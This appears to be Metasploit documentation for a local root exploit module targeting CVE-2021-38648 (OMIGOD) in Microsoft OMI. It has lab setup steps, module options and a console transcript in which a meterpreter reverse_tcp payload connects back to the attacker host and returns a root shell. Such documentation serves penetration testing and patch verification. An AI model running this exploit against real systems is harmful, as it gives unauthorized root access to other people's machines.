2.8 KiB
2.8 KiB
Vulnerable Application
By removing the authentication exchange, an attacker can issue requests to the local OMI management socket that will cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1 (released September 8th 2021).
Verification Steps
- Start the application using the Censys Dockerfile
docker build . -t ms-omi:cve-2021-38648docker run -it --entrypoint /bin/bash ms-omi:cve-2021-38648/etc/init.d/omid restart
- Start
msfconsole - Obtain a session within the container
- The
exploit/multi/script/web_deliveryworks well for this purpose
- The
- Do:
use exploit/linux/local/cve_2021_38648_omigod - Set the module options
- Do:
exploit - You should get a root shell.
Options
WritableDir
This is an advanced option.
A directory where you can write files. When using the Linux Dropper target, this option must be an absolute path and
less than 246 characters long.
SocketPath
This is an advanced option.
The path to the OMI server socket. The default path is /var/opt/omi/run/omiserver.sock however when this option is
left blank, it will be determined at runtime.
Scenarios
Ubuntu 20.04 x64, OMI v1.6.8, SCX v1.6.6
msf6 > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: smcintyre
meterpreter > background
[*] Backgrounding session 1...
msf6 > use exploit/linux/local/cve_2021_38648_omigod
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_38648_omigod) > set TARGET Linux\ Dropper
TARGET => Linux Dropper
msf6 exploit(linux/local/cve_2021_38648_omigod) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_38648_omigod) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/cve_2021_38648_omigod) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_38648_omigod) > check
[*] The target appears to be vulnerable. Version 1.6.8-0 is affected.
msf6 exploit(linux/local/cve_2021_38648_omigod) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.6.8-0 is affected.
[*] Writing '/tmp/zbACyVFZyT' (250 bytes) ...
[*] Writing '/tmp/OJ3FZ2W.py' (3824 bytes) ...
[*] Sending stage (3012548 bytes) to 192.168.159.128
[+] Deleted /tmp/zbACyVFZyT
[+] Deleted /tmp/OJ3FZ2W.py
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:51870 ) at 2021-10-27 11:47:48 -0400
meterpreter > getuid
Server username: root
meterpreter >